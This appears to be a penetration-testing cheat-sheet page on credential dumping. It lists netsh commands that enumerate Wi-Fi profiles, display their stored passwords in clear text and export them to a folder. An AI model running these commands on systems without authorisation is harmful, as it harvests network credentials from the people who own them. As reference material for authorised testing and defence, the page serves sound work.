> For the complete documentation index, see [llms.txt](https://ttp.parzival.sh/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ttp.parzival.sh/pentesting/infrastructure/active-directory/os-credential-dumping/wifi-profiles.md).

# WiFi Profiles

### List Available Profiles

```bash
netsh wlan show profiles
```

### Extraction

```bash
# Extract Passwords
netsh wlan show profile name="wireless network" key=clear

# Export Profiles
netsh wlan export profile name ="wireless network" folder=C:\temp
```
